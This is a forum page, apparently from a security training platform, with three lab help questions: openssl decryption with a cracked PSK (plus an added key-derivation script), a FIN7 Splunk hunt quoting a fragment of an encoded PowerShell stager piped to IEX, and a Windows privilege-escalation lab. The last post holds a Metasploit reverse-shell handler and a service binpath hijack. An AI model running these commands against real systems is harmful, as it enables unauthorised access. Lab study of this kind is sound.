getting started (4 topics)

Modern Encryption: Demonstrate Your Skills (Q9)
Maybe I'm over/under-thinking this (likely) or maybe there's an issue with this lab (less likely), but I'm struggling on Q9. I've successfully encrypted the file in Q5 and have run the appropriate command to retrieve the PSK from the capture file that was created. Per the instructions in the token_3.txt file I'm supposed to use that same password to decrypt an AES-256 file. I cannot get this password to successfully decrypt the file, however. I know it's the correct passphrase since I can use it in Wireshark to see the encrypted data in the capture. Am I supposed to extract the key for Q9 from the capture? I'm only seeing mostly DNS traffic (and looked at TXT records to see if a possible token existed in those).

    openssl enc -d -aes-256-cbc -nosalt -pbkdf2 -in Desktop/Lab-Files/encrypted_file_AES.enc -out Desktop/Lab-Files/plaintext_AES.txt -pass pass:<PSK from results of aircrack-ng>

I'm guessing I'm misunderstanding the instructions somehow (even though I feel like they explicitly tell me "you will find that the same password will help you decrypt 'encrypted_file_AES'").

Solved | 69 views | 0 likes | 2 comments
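An added example, not part of the post or of the lab: a Python script that reproduces how `openssl enc` turns a `-pass` value into the AES-256-CBC key and IV. The point for the question above is that the passphrase is only half of the input. Whether `-pbkdf2` is used (PBKDF2-HMAC with the `-md` digest, 10000 iterations unless `-iter` says otherwise) or the legacy `EVP_BytesToKey` path, which `-md` digest is used, and whether the file was written with `-nosalt` all change the derived key, so the right passphrase still fails whenever the decrypt flags differ from the ones used to encrypt. The first check is the file header: `openssl enc` output written without `-nosalt` starts with the eight bytes `Salted__` followed by an eight-byte salt, and a file with that header decrypted with `-d -nosalt` cannot work. The passphrase and the blob below are constructed for the demonstration; the lab's file and PSK are not reproduced here.

```python
import hashlib

SALTED_MAGIC = b"Salted__"

# Constructed sample inputs (not the lab's file or PSK): a passphrase and a blob laid
# out like an `openssl enc` output written without -nosalt, i.e. the 8-byte magic,
# an 8-byte salt, then ciphertext. The ciphertext bytes here are meaningless filler.
SAMPLE_PASSWORD = b"correct horse battery staple"
SAMPLE_SALT = bytes.fromhex("0011223344556677")
SAMPLE_BLOB = SALTED_MAGIC + SAMPLE_SALT + bytes(32)


def read_salt_header(blob):
    """Split an `openssl enc` output into (salt, ciphertext).

    Returns salt=None when there is no Salted__ header, which is what a file
    encrypted with -nosalt looks like. Decrypting a salted file with -d -nosalt
    feeds the magic and salt bytes into AES as if they were ciphertext.
    """
    if blob.startswith(SALTED_MAGIC) and len(blob) >= 16:
        return blob[8:16], blob[16:]
    return None, blob


def evp_bytes_to_key(password, salt, md, key_len, iv_len):
    """OpenSSL's legacy EVP_BytesToKey with count=1, used by enc without -pbkdf2:
    D_1 = H(pw || salt), D_i = H(D_{i-1} || pw || salt), key || iv = D_1 || D_2 || ...
    """
    out = b""
    prev = b""
    while len(out) < key_len + iv_len:
        prev = hashlib.new(md, prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]


def openssl_enc_key_iv(password, salt, *, pbkdf2, md="sha256", iterations=10000,
                       key_len=32, iv_len=16):
    """Derive (key, iv) the way `openssl enc -aes-256-cbc` does for a -pass value.

    pbkdf2=True  : PBKDF2-HMAC-<md>; key || iv are the first 48 bytes of one output;
                   10000 iterations unless -iter is given.
    pbkdf2=False : legacy EVP_BytesToKey with the -md digest (sha256 by default).
    salt=None    : -nosalt, i.e. an empty salt on both paths.
    """
    salt = salt or b""
    if pbkdf2:
        dk = hashlib.pbkdf2_hmac(md, password, salt, iterations, key_len + iv_len)
        return dk[:key_len], dk[key_len:key_len + iv_len]
    return evp_bytes_to_key(password, salt, md, key_len, iv_len)


def candidate_keys(password, blob):
    """Derive the key for the common flag combinations against one file, to show
    that the same passphrase yields a different AES key under each. The -nosalt
    row ignores any salt the file carries, which is exactly what -d -nosalt does."""
    salt, _ = read_salt_header(blob)
    combos = {
        "-pbkdf2 (salt from header)": (salt, True, "sha256"),
        "-pbkdf2 -nosalt": (None, True, "sha256"),
        "legacy -md sha256 (salt from header)": (salt, False, "sha256"),
        "legacy -md md5 (salt from header)": (salt, False, "md5"),
    }
    return {name: openssl_enc_key_iv(password, s, pbkdf2=p, md=m)
            for name, (s, p, m) in combos.items()}


if __name__ == "__main__":
    salt, _ = read_salt_header(SAMPLE_BLOB)
    print("Salted__ header present:", salt is not None,
          "salt:", salt.hex() if salt else "-")
    for name, (key, iv) in candidate_keys(SAMPLE_PASSWORD, SAMPLE_BLOB).items():
        print(f"{name:40s} key={key.hex()[:16]}... iv={iv.hex()}")
```

The practical use is diagnostic: run `head -c 8 encrypted_file_AES.enc` to see whether the header is there, then make the `-pbkdf2`, `-nosalt` and `-md` flags on the decrypt side match whatever the encrypt side used; every row of `candidate_keys` is a different key, and only the matching one will produce plaintext.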
FIN7 Threat Hunting with Splunk: Ep.3 – Execution Logs

I am pulling my hair out with this last question:

Rebuild the PowerShell script from the previous question using the three parts found in the PowerShell operational logs. What is the MD5 hash of this file? (The file should not contain any trailing white space or return characters)

I ran

    index=* (EventCode=4104) | search "stager.ps1" AND "scriptblock" | table _raw

and added the script content of files (1 of 3), (2 of 3) and (3 of 3) to a new file. I removed the spaces and made sure they are glued together. I pasted the file into CyberChef with MD5 selected and I keep getting the wrong hash. See a sample of the beginning and end of the 3 files below (this is just a sample). I really don't know what else to do with this.

    $EncodedCompressedFile = @'
    7b1pk+LKcjD83RH3P5y4cT/Y0ddusfXAfcMRT5U2JJCgBBJIDn8AAQIklmmgBfz6N7O00sCsnuuxH9vPUcRMo1qycqvMrFItfxmsgu3keHqf//avv/2fP//pH/5NiiJts9+9H//xz+H8fTuPatV/mUXRn//p
    u3rgE9+I/KPY62u+qTQuvp0Xqu3KPkEovj/867/++Z/+9A9/+oe/jFZbY7757V9/w1+96fpvf3NW78fTJCJRtPP/UfjrvxmT4/Lf//Y3Y3L+x79ML8f54V+6821wXP5VOFcEQfgn+FuDv/CnLnCY/za4HI7zzb9Yp+1xtZn/i7Y9zt93+8H8/WPlQ3Vj8n5YTiKAKe72lxToX4W/prj89aaVHEuOm/g+nxznwyX8mQFuRR38ja3//w==
    '@
    $Decoded = [System.Convert]::FromBase64String($EncodedCompressedFile)
    $MemStream = New-Object System.IO.MemoryStream
    $MemStream.Write($Decoded, 0, $Decoded.Length)
    $MemStream.Seek(0,0) | Out-Null
    $CompressedStream = New-Object System.IO.Compression.DeflateStream($MemStream, [System.IO.Compression.CompressionMode]::Decompress)
    $StreamReader = New-Object System.IO.StreamReader($CompressedStream)
    $Output = $StreamReader.readtoend()
    $Output | IEX

Solved | 123 views | 0 likes | 1 comment
Privilege Escalation: Windows – Weak Service Permissions

Could someone please explain the steps to be performed in the last part of the lab? Where should I run "migrate -N LogonUI.exe"? It fails in Windows and Kali.

    msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.102.60.159; set lport 4444; exploit"
    sc config DeleteFiles binpath= "C:\Temp\reverse.exe"

sc qc DeleteFiles shows the path is "C:\Temp\reverse.exe".

I restart Windows, but Windows doesn't really restart with a right click on the Windows logo, "Shut Down or Sign out", and I execute again:

    xfreerdp /v:10.102.158.164 /u:Levi /p:Abc123 /dynamic-resolution

migrate -N LogonUI.exe: where, and after which steps?

When restarting Windows this is the message, but it doesn't restart:

    [21:07:26:552] [64590:64591] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C]

Regards.

Solved | 175 views | 1 like | 2 comments